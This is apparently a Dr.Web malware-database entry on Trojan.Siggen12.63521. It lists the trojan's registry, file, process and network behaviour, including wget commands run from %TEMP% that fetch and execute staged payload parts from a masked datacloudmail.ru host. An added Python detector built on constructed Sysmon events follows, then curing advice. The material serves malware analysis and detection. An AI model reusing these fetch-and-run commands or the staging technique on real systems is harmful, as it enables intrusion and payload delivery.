Trojan.Siggen12.63521

Added to the Dr.Web virus database: 2021-03-31

Virus description added:

Technical Information

To ensure autorun and distribution
Sets the following service settings
  • [<HKLM>\System\CurrentControlSet\Services\SNAPSHOD0] 'ImagePath' = '<DRIVERS>\SNAPSHOD0.sys'
Creates the following services
  • 'SNAPSHOD0' <DRIVERS>\SNAPSHOD0.sys
Malicious functions
Executes the following
  • '%WINDIR%\syswow64\taskkill.exe' /im "<File name>.exe" /F
  • '%WINDIR%\syswow64\taskkill.exe' /im SnapShot.Exe /F
Modifies file system
Creates the following files
Deletes the following files
  • %TEMP%\ok.js
  • u:\chrome\76.0.3809.100\default_apps\drive.crx
  • u:\chrome\76.0.3809.100\default_apps\docs.crx
  • u:\chrome\master_preferences_zoom-100%
  • u:\chrome\master_preferences
  • %TEMP%\0chrome.exe
  • %TEMP%\123chrome.exe
  • %TEMP%\wget.exe
  • %TEMP%\conf2chrome
  • %TEMP%\conf1chrome
  • %TEMP%\4wvhh5s1uchrome
  • %TEMP%\7chrome.#
  • %TEMP%\6chrome.#
  • %TEMP%\5chrome.#
  • %TEMP%\4chrome.#
  • %TEMP%\3chrome.#
  • %TEMP%\2chrome.#
  • %TEMP%\1chrome.#
  • %TEMP%\0chrome.#
  • %WINDIR%\temp\udda2c4.tmp
  • u:\chrome\76.0.3809.100\default_apps\gmail.crx
  • u:\chrome\76.0.3809.100\default_apps\youtube.crx
Moves the following files
  • from %TEMP%\2mvpt9fx1 to %TEMP%\snapshot.exe
  • from %TEMP%\4wvhh5s1u to %TEMP%\4wvhh5s1uchrome
Substitutes the following files
  • %TEMP%\ok.js
Network activity
Connects to
  • 'cl######.datacloudmail.ru':80
  • 'cl######.datacloudmail.ru':443
TCP
  • 'cl######.datacloudmail.ru':443
UDP
  • DNS ASK cl######.datacloudmail.ru
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
  • ClassName: '' WindowName: '1149914/908'
  • ClassName: '' WindowName: '1150351/2716'
Creates and executes the following
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=3Chrome.# http://cl######.datacloudmail.ru/weblink/get/5w4N/3CU11pRNB
  • '%TEMP%\0chrome.exe'
  • '%TEMP%\123chrome.exe'
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=6Chrome.# http://cl######.datacloudmail.ru/weblink/get/2PNL/2z5CEzQih
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=7Chrome.# http://cl######.datacloudmail.ru/weblink/get/449Q/2M9d9xUJx
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=5Chrome.# http://cl######.datacloudmail.ru/weblink/get/5qzH/35m7dvZDQ
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=4Chrome.# http://cl######.datacloudmail.ru/weblink/get/3ceU/5jHut9fAm
  • 'C:\chrome\chrome.exe' --type=watcher --main-thread-id=828 --on-initialized-event-handle=28 --parent-handle=164 /prefetch:6
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=2Chrome.# http://cl######.datacloudmail.ru/weblink/get/EPDP/2rjryuppc
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=1Chrome.# http://cl######.datacloudmail.ru/weblink/get/2w6W/4qR6VttC9
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=0Chrome.# http://cl######.datacloudmail.ru/weblink/get/3i8S/3PbMVu4a5
  • '%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3egv/4Wvhh5S1u
  • '%TEMP%\snapshot.exe' Rd.Sna U: -vq
  • '%TEMP%\snapshot.exe' -!unmount
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=Rd.Sna http://cl######.datacloudmail.ru/weblink/get/2gXn/hH5sR16jd
  • '%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3FZq/2MVPt9fx1
  • 'C:\chrome\chrome.exe' --user-data-dir=U:\Chrome\UserData --disable-infobars --disable-logging --allow-outdated-plugins https://join.skype.com/<File name>.exe
  • 'C:\chrome\chrome.exe' --type=crashpad-handler --user-data-dir=U:\Chrome\UserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=U:\Chrome\UserData\Crashpad --metrics-dir=U:\Chrome\UserData -...
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\Chrome76.Bat" "<Full path to file>" "<Current directory>" "<File name>.exe" "%LOCALAPPDATA%\Temp" "' (with hidden window)
  • 'C:\chrome\chrome.exe' --type=watcher --main-thread-id=828 --on-initialized-event-handle=28 --parent-handle=164 /prefetch:6' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\Chrome76.Bat" "<Full path to file>" "<Current directory>" "<File name>.exe" "%LOCALAPPDATA%\Temp" "
  • '%WINDIR%\syswow64\xcopy.exe' /i/h/y/r "%TEMP%\Master_Preferences"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "U:\Chrome\76.0.3809.100" "76.0.3809.100\"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "U:\Chrome\Master_Preferences"
  • '%WINDIR%\syswow64\findstr.exe' /BIR "A....."
  • '%WINDIR%\syswow64\attrib.exe' "<Full path to file>"
  • '%WINDIR%\syswow64\attrib.exe' -r %TEMP%\wz.bat
  • '%WINDIR%\syswow64\find.exe' /i "Wget.Exe"
  • '%WINDIR%\syswow64\tasklist.exe' /fi "IMAGENAME eq Wget.Exe"
  • '%WINDIR%\syswow64\ping.exe' -n 2 localhost
  • '%WINDIR%\syswow64\cmd.exe' /K wg.bat
  • '%WINDIR%\syswow64\attrib.exe' +r SnapShot.Exe
  • '%WINDIR%\syswow64\attrib.exe' +a +r +h +s SnapShod0.Sys
  • '%WINDIR%\syswow64\ping.exe' -n 6 localhost
  • '%WINDIR%\syswow64\cmd.exe' /K wz.bat
  • '%WINDIR%\syswow64\attrib.exe' +r wz.bat
  • '%WINDIR%\syswow64\cscript.exe' Ok.Js //Nologo
  • '%WINDIR%\syswow64\attrib.exe' +r Chrome76.bat
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "%TEMP%\76.0.3809.100" "76.0.3809.100\"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "%TEMP%\UserData" "U:\Chrome\UserData\"
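The process record above is more useful as a detection source than the file list: wget.exe is run from %TEMP% with --no-check-certificate to fetch numbered parts named 0Chrome.# to 7Chrome.# plus a Rd.Sna image from a datacloudmail.ru host, snapshot.exe (the Drive Snapshot backup tool, whose driver is the SnapShod0.Sys file hidden with attrib +a +r +h +s) mounts that image as drive U:, and a Chrome 76 build is then started with its profile on U:\Chrome\UserData and --allow-outdated-plugins. The following is an added example, not Dr.Web's code: a scoring detector that runs those observations as rules over constructed Sysmon-style process-creation (Event ID 1) and DNS (Event ID 22) records. The event fields, file paths, rule weights and threshold are assumptions for illustration. Note that datacloudmail.ru appears to be a public file-hosting domain (Mail.ru Cloud), so the hostname alone is treated as corroboration rather than as an alert on its own.

```python
"""Score Sysmon-style events against the behaviour record of Trojan.Siggen12.63521.

Added example, not part of the Dr.Web page. Sample events are constructed to mimic
the command lines in the record; weights and threshold are illustrative.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real logs). "id" mirrors Sysmon event IDs:
# 1 = process creation, 22 = DNS query. The host is kept masked as on the page.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "image": r"C:\Users\victim\AppData\Local\Temp\wget.exe",
     "cmdline": r"wget.exe --no-check-certificate --output-document=3Chrome.# "
                r"http://cl######.datacloudmail.ru/weblink/get/5w4N/3CU11pRNB"},
    {"id": "1", "image": r"C:\Users\victim\AppData\Local\Temp\snapshot.exe",
     "cmdline": r"snapshot.exe Rd.Sna U: -vq"},
    {"id": "1", "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": r"attrib.exe +a +r +h +s SnapShod0.Sys"},
    {"id": "1", "image": r"C:\chrome\chrome.exe",
     "cmdline": r"chrome.exe --user-data-dir=U:\Chrome\UserData --disable-infobars "
                r"--disable-logging --allow-outdated-plugins https://join.skype.com/x.exe"},
    {"id": "22", "image": r"C:\Users\victim\AppData\Local\Temp\wget.exe",
     "query": "cl######.datacloudmail.ru"},
    # Benign noise: wget installed under Program Files, certificate checks left on.
    {"id": "1", "image": r"C:\Program Files\wget\wget.exe",
     "cmdline": r"wget.exe https://example.com/release.tar.gz"},
]

# Alert when one strong (weight >= 4) hit is corroborated by at least one more hit.
ALERT_THRESHOLD = 8


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def _in_temp(image: str) -> bool:
    """True when the image lives under a ...\\Temp\\ directory."""
    return "\\temp\\" in image.lower()


def match_rules(e: Dict[str, str]) -> List[Tuple[str, int]]:
    """Return (rule_name, weight) for every rule the event satisfies."""
    image = e.get("image", "")
    base = _base(image)
    cmd = e.get("cmdline", "").lower()
    query = e.get("query", "").lower()
    hits: List[Tuple[str, int]] = []
    # wget dropped into %TEMP% and told to skip TLS verification.
    if base == "wget.exe" and _in_temp(image) and "--no-check-certificate" in cmd:
        hits.append(("wget_unverified_tls_from_temp", 3))
    # The sample-specific part naming scheme NChrome.# used for the staged download.
    if re.search(r"--output-document=\d+chrome\.#", cmd):
        hits.append(("staged_chrome_part_download", 5))
    # Drive Snapshot run from %TEMP% to mount a .Sna disk image (Rd.Sna -> U:).
    if base == "snapshot.exe" and _in_temp(image) and re.search(r"\b\w+\.sna\b", cmd):
        hits.append(("drive_snapshot_mount_from_temp", 4))
    # A .sys file being marked hidden+system with attrib.
    if base == "attrib.exe" and "+h" in cmd and "+s" in cmd and cmd.rstrip().endswith(".sys"):
        hits.append(("driver_file_hidden_with_attrib", 4))
    # Chrome profile placed on a drive other than C: with outdated plugins allowed.
    m = re.search(r"--user-data-dir=([a-z]):\\", cmd)
    if base == "chrome.exe" and m and m.group(1) != "c" and "--allow-outdated-plugins" in cmd:
        hits.append(("chrome_profile_on_mounted_drive", 3))
    # Public file-hosting domain used by the downloader: corroboration only.
    if query.endswith(".datacloudmail.ru"):
        hits.append(("dns_datacloudmail_host", 1))
    return hits


def score_events(events: List[Dict[str, str]]) -> Tuple[int, List[Tuple[str, str]]]:
    """Sum rule weights over all events and collect (rule, evidence) findings."""
    total = 0
    findings: List[Tuple[str, str]] = []
    for e in events:
        for name, weight in match_rules(e):
            total += weight
            findings.append((name, e.get("cmdline") or e.get("query", "")))
    return total, findings


def is_alert(total: int) -> bool:
    """Alert decision for a host's summed score."""
    return total >= ALERT_THRESHOLD


if __name__ == "__main__":
    score, found = score_events(SAMPLE_EVENTS)
    for rule, evidence in found:
        print(f"{rule:34s} {evidence}")
    print("score", score, "alert" if is_alert(score) else "no alert")
```

Single rules are deliberately weak: --no-check-certificate and attrib +h +s each occur in legitimate administration, and the datacloudmail.ru host serves ordinary Mail.ru Cloud downloads. The combination seen here (downloader in %TEMP%, image mounted by Drive Snapshot, a driver file hidden, Chrome profile on the mounted drive) is what pushes the score over the threshold.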

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of any removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.


  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow the recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a ransom, or some other announcement prevents you from using the device normally), do the following:
    • Boot your smartphone or tablet into safe mode (depending on the operating system version and the particular device, this is done in various ways; consult the user guide shipped with the device or contact its manufacturer);
    • Once safe mode is active, install Dr.Web for Android on the infected device and run a full system scan; follow the steps recommended for neutralizing the detected threats;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android